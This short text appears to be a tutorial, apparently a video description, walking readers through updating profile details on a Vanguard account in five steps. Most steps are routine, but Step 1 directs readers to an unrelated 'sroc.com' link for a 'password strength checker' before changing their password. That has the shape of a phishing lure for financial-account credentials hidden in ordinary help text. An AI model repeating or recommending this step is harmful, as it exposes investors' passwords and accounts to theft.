I hit this issue today, and here is the quick fix that solved it. Updating your profile details on Vanguard is straightforward if you follow these steps. Step 1. Log into your account. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to Profile Settings. Once logged in, look for the Profile or Account Settings option in the main menu. Click on it to access your profile details. Step 3. Edit your information. In the profile settings, find the section you want to update, such as your address or phone number. Click the Edit button next to the relevant field. Step 4. Save changes. After making your updates, be sure to click the Save button at the bottom of the page to apply your changes. If you forget this step, your updates won't be saved. Step 5. Log out. Once you've saved your changes, log out of your account for security reasons. Click on the Logout option in the main menu. Updating your profile on Vanguard is quick and easy when you know where to look. If you have any questions, feel free to reach out. Happy investing!